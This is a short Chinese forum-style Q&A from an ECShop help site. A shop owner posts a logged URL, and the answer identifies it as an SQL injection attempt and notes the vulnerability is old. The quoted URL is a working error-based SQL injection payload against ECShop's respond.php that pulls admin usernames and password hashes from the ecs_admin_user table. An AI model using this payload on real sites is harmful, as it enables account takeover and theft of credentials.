昨天有人提交了这个网址

2016-07-07 15:19 来源:www.chinab4c.com 作者:ecshop专家

www.**.com/respond.php?code=tenpay&attach=voucher&sp_billno=1 and 1=2 union select 1 and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
这是什么意思?

回答:


有人试图在你的站上搞sql注入。如果你的站有安全问题,可联系我。QQ 36556161

这个漏洞。早就有了